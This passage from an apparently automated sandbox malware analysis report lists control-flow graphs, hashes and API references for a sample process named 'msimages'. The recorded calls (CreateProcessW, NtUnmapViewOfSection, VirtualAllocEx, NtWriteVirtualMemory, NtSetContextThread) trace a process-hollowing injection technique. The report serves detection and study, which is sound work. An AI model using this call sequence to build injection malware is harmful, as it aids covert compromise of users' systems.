2971->2972 2974 1c6544 2972->2974 2974->2877 2976 1c64cc VirtualAllocEx 2975->2976 2978 1c6544 2976->2978 2978->2877 2980 1c65f1 NtWriteVirtualMemory 2979->2980 2982 1c668a 2980->2982 2982->2879 2984 1c65f1 NtWriteVirtualMemory 2983->2984 2986 1c668a 2984->2986 2986->2879 2988 1c6749 NtSetContextThread 2987->2988 2990 1c67c1 2988->2990 2990->2883 2992 1c6749 NtSetContextThread 2991->2992 2994 1c67c1 2992->2994 2994->2883 2996 1c62a4 NtReadVirtualMemory 2995->2996 2998 1c631c 2996->2998 2998->2955 3000 1c62a4 NtReadVirtualMemory 2999->3000 3002 1c631c 3000->3002 3002->2955 3004 1c73dc 3003->3004 3006 1c6258 NtReadVirtualMemory 3004->3006 3007 1c6250 NtReadVirtualMemory 3004->3007 3005 1c7491 3005->2914 3006->3005 3007->3005 3009 1c73dc 3008->3009 3011 1c6258 NtReadVirtualMemory 3009->3011 3012 1c6250 NtReadVirtualMemory 3009->3012 3010 1c7491 3010->2914 3011->3010 3012->3010 3017 1c3db0 3018 1c3ddc 3017->3018 3022 1c4a5d 10 API calls 3018->3022 3019 1c3e90 3021 1c6851 10 API calls 3019->3021 3020 1c3ef2 3021->3020 3022->3019

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 320 1c57a0-1c585a 322 1c5860-1c589b 320->322 323 1c5912-1c5927 320->323 340 1c589d-1c58a5 322->340 341 1c58d3-1c58e4 322->341 324 1c592d-1c5973 323->324 325 1c59d7-1c59db 323->325 345 1c5975-1c597d 324->345 346 1c59b1-1c59bc 324->346 326 1c59dd-1c5a1f 325->326 327 1c5a25-1c5a76 325->327 326->327 330 1c5a7c-1c5ab7 327->330 331 1c5b2e-1c5b40 327->331 357 1c5aef-1c5b00 330->357 358 1c5ab9-1c5ac1 330->358 333 1c5b5d-1c5b6f 331->333 334 1c5b42-1c5b5a 331->334 337 1c5b8c-1c5c02 CreateProcessW 333->337 338 1c5b71-1c5b89 333->338 334->333 347 1c5c0b-1c5c4c 337->347 348 1c5c04-1c5c0a 337->348 338->337 342 1c58c8-1c58d1 340->342 343 1c58a7-1c58b1 340->343 352 1c58ea-1c590a 341->352 342->352 350 1c58b5-1c58c4 343->350 351 1c58b3 343->351 354 1c597f-1c5989 345->354 355 1c59a0-1c59af 345->355 360 1c59c2-1c59d1 346->360 369 1c5c4e-1c5c5d 347->369 370 1c5c63-1c5c7a 347->370 348->347 350->350 359 1c58c6 350->359 351->350 352->323 364 1c598d-1c599c 354->364 365 1c598b 354->365 355->360 373 1c5b06-1c5b26 357->373 367 1c5ae4-1c5aed 358->367 368 1c5ac3-1c5acd 358->368 359->342 360->325 364->364 366 1c599e 364->366 365->364 366->355 367->373 371 1c5acf 368->371 372 1c5ad1-1c5ae0 368->372 369->370 378 1c5c7c-1c5c88 370->378 379 1c5c93-1c5ca3 370->379 371->372 372->372 375 1c5ae2 372->375 373->331 375->367 378->379 380 1c5cba-1c5cfd 379->380 381 1c5ca5-1c5cb4 379->381 386 1c5d0d-1c5d11 380->386 387 1c5cff-1c5d03 380->387 381->380 389 1c5d21-1c5d25 386->389 390 1c5d13-1c5d17 386->390 387->386 388 1c5d05-1c5d08 call 1c0420 387->388 388->386 393 1c5d35 389->393 394 1c5d27-1c5d2b 389->394 390->389 392 1c5d19-1c5d1c call 1c0420 390->392 392->389 398 1c5d36 393->398 394->393 395 1c5d2d-1c5d30 call 1c0420 394->395 395->393 398->398
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 001C5BEF
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 25283be3e73a3a5c804466f447d2258550815f04947053ac4806154a7178f677
                                                • Instruction ID: aa4f07bf3f933860f230daf7062bdd27e361928b863526a6d285c3806afc2401
                                                • Opcode Fuzzy Hash: 25283be3e73a3a5c804466f447d2258550815f04947053ac4806154a7178f677
                                                • Instruction Fuzzy Hash: 6902B274E00228CFEB24CFA9C885B9DBBB2BF49304F1481A9E419B7251D774AE85CF55

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 399 1c5794-1c585a 401 1c5860-1c589b 399->401 402 1c5912-1c5927 399->402 419 1c589d-1c58a5 401->419 420 1c58d3-1c58e4 401->420 403 1c592d-1c5973 402->403 404 1c59d7-1c59db 402->404 424 1c5975-1c597d 403->424 425 1c59b1-1c59bc 403->425 405 1c59dd-1c5a1f 404->405 406 1c5a25-1c5a76 404->406 405->406 409 1c5a7c-1c5ab7 406->409 410 1c5b2e-1c5b40 406->410 436 1c5aef-1c5b00 409->436 437 1c5ab9-1c5ac1 409->437 412 1c5b5d-1c5b6f 410->412 413 1c5b42-1c5b5a 410->413 416 1c5b8c-1c5c02 CreateProcessW 412->416 417 1c5b71-1c5b89 412->417 413->412 426 1c5c0b-1c5c4c 416->426 427 1c5c04-1c5c0a 416->427 417->416 421 1c58c8-1c58d1 419->421 422 1c58a7-1c58b1 419->422 431 1c58ea-1c590a 420->431 421->431 429 1c58b5-1c58c4 422->429 430 1c58b3 422->430 433 1c597f-1c5989 424->433 434 1c59a0-1c59af 424->434 439 1c59c2-1c59d1 425->439 448 1c5c4e-1c5c5d 426->448 449 1c5c63-1c5c7a 426->449 427->426 429->429 438 1c58c6 429->438 430->429 431->402 443 1c598d-1c599c 433->443 444 1c598b 433->444 434->439 452 1c5b06-1c5b26 436->452 446 1c5ae4-1c5aed 437->446 447 1c5ac3-1c5acd 437->447 438->421 439->404 443->443 445 1c599e 443->445 444->443 445->434 446->452 450 1c5acf 447->450 451 1c5ad1-1c5ae0 447->451 448->449 457 1c5c7c-1c5c88 449->457 458 1c5c93-1c5ca3 449->458 450->451 451->451 454 1c5ae2 451->454 452->410 454->446 457->458 459 1c5cba-1c5cfd 458->459 460 1c5ca5-1c5cb4 458->460 465 1c5d0d-1c5d11 459->465 466 1c5cff-1c5d03 459->466 460->459 468 1c5d21-1c5d25 465->468 469 1c5d13-1c5d17 465->469 466->465 467 1c5d05-1c5d08 call 1c0420 466->467 467->465 472 1c5d35 468->472 473 1c5d27-1c5d2b 468->473 469->468 471 1c5d19-1c5d1c call 1c0420 469->471 471->468 477 1c5d36 472->477 473->472 474 1c5d2d-1c5d30 call 1c0420 473->474 474->472 477->477
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 001C5BEF
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: c696d0bfca847e080e7023285f9ca89039139750fb49ad777f6bd4a883294008
                                                • Instruction ID: d84d78c3a3ffab6ca16c3dfd431a696b204d2927c9995470e601b630e336a775
                                                • Opcode Fuzzy Hash: c696d0bfca847e080e7023285f9ca89039139750fb49ad777f6bd4a883294008
                                                • Instruction Fuzzy Hash: FEF1C274D00218CFEB24CFA9C885BADBBB2BF49304F1481A9E419B7251D774AE85CF55

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 776 1c65a0-1c6610 778 1c6627-1c6688 NtWriteVirtualMemory 776->778 779 1c6612-1c6624 776->779 781 1c668a-1c6690 778->781 782 1c6691-1c66e3 778->782 779->778 781->782
                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 001C6678
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID:
                                                • API String ID: 3527976591-0
                                                • Opcode ID: bdb8e346ce5facdb07f49c04d222e098ab4908bee75b2f813244e3834c04ff33
                                                • Instruction ID: c14ed25473be45f5afd9d2e1ecf456ae00f289ab285bff385dcc6922f9488258
                                                • Opcode Fuzzy Hash: bdb8e346ce5facdb07f49c04d222e098ab4908bee75b2f813244e3834c04ff33
                                                • Instruction Fuzzy Hash: AA41BCB5D012589FDF10CFA9D984AEEFBF1BF49310F24902AE818B7250D339AA45CB54

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 787 1c65a8-1c6610 789 1c6627-1c6688 NtWriteVirtualMemory 787->789 790 1c6612-1c6624 787->790 792 1c668a-1c6690 789->792 793 1c6691-1c66e3 789->793 790->789 792->793
                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 001C6678
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID:
                                                • API String ID: 3527976591-0
                                                • Opcode ID: af199e1819824cae48501d675bd85af3f8ed892a68861a4c09dd614197bdd130
                                                • Instruction ID: 146d8865417c4767a21b193fc83ddc5ecc9243c8aeb0ba007ef85aa678b716ae
                                                • Opcode Fuzzy Hash: af199e1819824cae48501d675bd85af3f8ed892a68861a4c09dd614197bdd130
                                                • Instruction Fuzzy Hash: 8841BCB5D012589FDF00CFA9D984AEEFBF1BF49310F20942AE818B7250D335AA45CB64

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 798 1c6250-1c631a NtReadVirtualMemory 801 1c631c-1c6322 798->801 802 1c6323-1c6375 798->802 801->802
                                                APIs
                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 001C630A
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: MemoryReadVirtual
                                                • String ID:
                                                • API String ID: 2834387570-0
                                                • Opcode ID: 54800dc15f6ef81f5577becb2ed9ba0a6d208a0af3a6ce1dd82731e85ffc65b7
                                                • Instruction ID: 28144950727056d605637c7ef4edf72ccd9226a5b086e4b0e14da37935471b6b
                                                • Opcode Fuzzy Hash: 54800dc15f6ef81f5577becb2ed9ba0a6d208a0af3a6ce1dd82731e85ffc65b7
                                                • Instruction Fuzzy Hash: 2041AAB5D042589FDF10CFA9D884AEEFBB1BF59310F10A42AE818B7250D735AA45CF64

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 807 1c6258-1c631a NtReadVirtualMemory 810 1c631c-1c6322 807->810 811 1c6323-1c6375 807->811 810->811
                                                APIs
                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 001C630A
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: MemoryReadVirtual
                                                • String ID:
                                                • API String ID: 2834387570-0
                                                • Opcode ID: a8ee3af4390d804d94caa60f6da15bc168d4ec01c3577567a1f2d6aab2093b16
                                                • Instruction ID: f432887ec4c8fde236b397ac25e27cd76da87463d2bd66236ca82ddeb9fb6cd7
                                                • Opcode Fuzzy Hash: a8ee3af4390d804d94caa60f6da15bc168d4ec01c3577567a1f2d6aab2093b16
                                                • Instruction Fuzzy Hash: 9F419BB5D002589FDF10CFA9D884AEEFBB1BF59310F10A42AE818B7250D735AA45CF64

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 834 1c66f9-1c6760 836 1c6777-1c67bf NtSetContextThread 834->836 837 1c6762-1c6774 834->837 839 1c67c8-1c6814 836->839 840 1c67c1-1c67c7 836->840 837->836 840->839
                                                APIs
                                                • NtSetContextThread.NTDLL(?,?), ref: 001C67AF
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: f9cc101d02a74df0897ef57727c9824fda666eb8b02740e394f30000b809904f
                                                • Instruction ID: d4b721fc6b9e133b36d4b5d79cea59c90945e546030fd69b2651c439aaec4a3d
• Opcode Fuzzy Hash: f9cc101d02a74df0897ef57727c9824fda666eb8b02740e394f30000b809904f
• Instruction Fuzzy Hash: 2841BDB5D002589FDB10CFA9D984AEEBBF1AF88314F24842AE418B7250D7389A45CF54

Control-flow Graph
• Blocks: 845 1c6700-1c6760; 847 1c6777-1c67bf (NtSetContextThread); 848 1c6762-1c6774; 850 1c67c8-1c6814; 851 1c67c1-1c67c7
• Edges: 845->847, 845->848, 847->850, 847->851, 848->847, 851->850
APIs
• NtSetContextThread.NTDLL(?,?), ref: 001C67AF
Memory Dump Source
• Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
Similarity
• API ID: ContextThread
• String ID:
• API String ID: 1591575202-0
• Opcode ID: 1b387b6ee57c6a0fc9b0b2f650b0b0010a02ef2a34cf976e87d3171af69c321f
• Instruction ID: c7c345c9b7da5a8c3c8a0c1506fa3fbdc875cda11db4df8ad6e4660511d25305
• Opcode Fuzzy Hash: 1b387b6ee57c6a0fc9b0b2f650b0b0010a02ef2a34cf976e87d3171af69c321f
• Instruction Fuzzy Hash: CD31ACB5D002589FDB14CFA9D884AEEFBF1BF89314F24842AE418B7250D778AA45CF54

Control-flow Graph
• Blocks: 856 1c6381-1c6421 (NtUnmapViewOfSection); 859 1c642a-1c646e; 860 1c6423-1c6429
• Edges: 856->859, 856->860, 860->859
APIs
• NtUnmapViewOfSection.NTDLL(?,?), ref: 001C6411
Memory Dump Source
• Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
Similarity
• API ID: SectionUnmapView
• String ID:
• API String ID: 498011366-0
• Opcode ID: a674ca37d78e72cf22fba3fa885c1f67b48d1d68216af6303a497599d7d356ac
• Instruction ID: 82e58cda8b80c85de2cc24fcde99d00f6a02c5354751d7045f7c1ddf0871e916
• Opcode Fuzzy Hash: a674ca37d78e72cf22fba3fa885c1f67b48d1d68216af6303a497599d7d356ac
• Instruction Fuzzy Hash: 2031ECB4D052189FDF10CFA9E884AEEFBB1BF89310F20942AE805B7200C375AA45CF54

Control-flow Graph
• Blocks: 865 1c6388-1c6421 (NtUnmapViewOfSection); 868 1c642a-1c646e; 869 1c6423-1c6429
• Edges: 865->868, 865->869, 869->868
APIs
• NtUnmapViewOfSection.NTDLL(?,?), ref: 001C6411
Memory Dump Source
• Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
Similarity
• API ID: SectionUnmapView
• String ID:
• API String ID: 498011366-0
• Opcode ID: 76c7d9fc2c3716161544143fc3a57c116b9e13223ddce2a9f485ecb41fa7ea7f
• Instruction ID: 4d85b0bb4d490d012885c4455c343cfa6422415b8e1568fc961387a33bfe001d
• Opcode Fuzzy Hash: 76c7d9fc2c3716161544143fc3a57c116b9e13223ddce2a9f485ecb41fa7ea7f
• Instruction Fuzzy Hash: AF31BBB4D012189FDF14CFA9D984A9EFBB1FF89310F20942AE815B7210D775AA45CF94

Control-flow Graph
• Blocks: 816 1c6481-1c6542 (VirtualAllocEx); 819 1c654b-1c6595; 820 1c6544-1c654a
• Edges: 816->819, 816->820, 820->819
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001C6532
Memory Dump Source
• Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: da555dbb34192a0a13fa5f2ea3d22cb6b13f81c65b40ac364401b4e93ebde781
• Instruction ID: 1c659a1d6ebdfc087ce2c65a71b206c56fb8a70b83127cec78785c833f4e918b
• Opcode Fuzzy Hash: da555dbb34192a0a13fa5f2ea3d22cb6b13f81c65b40ac364401b4e93ebde781
• Instruction Fuzzy Hash: 9A319AB5D042589FCF10CFA9D984AEEFBB1BF59310F20942AE814B7210D335AA45CF55

Control-flow Graph
• Blocks: 825 1c6488-1c6542 (VirtualAllocEx); 828 1c654b-1c6595; 829 1c6544-1c654a
• Edges: 825->828, 825->829, 829->828
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001C6532
Memory Dump Source
• Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 8a8645d71e58178bbd0d46921ae819025ed06215cd4e7cc978f612a7499c0f95
• Instruction ID: 84942ece25106d7f297bb178dfbdcd80f30522dca15a75daeea8a09c8278d2df
• Opcode Fuzzy Hash: 8a8645d71e58178bbd0d46921ae819025ed06215cd4e7cc978f612a7499c0f95
• Instruction Fuzzy Hash: FE319AB5D002589FCF10CFA9D984AEEFBB1BF59310F20942AE815B7210D735AA46CF64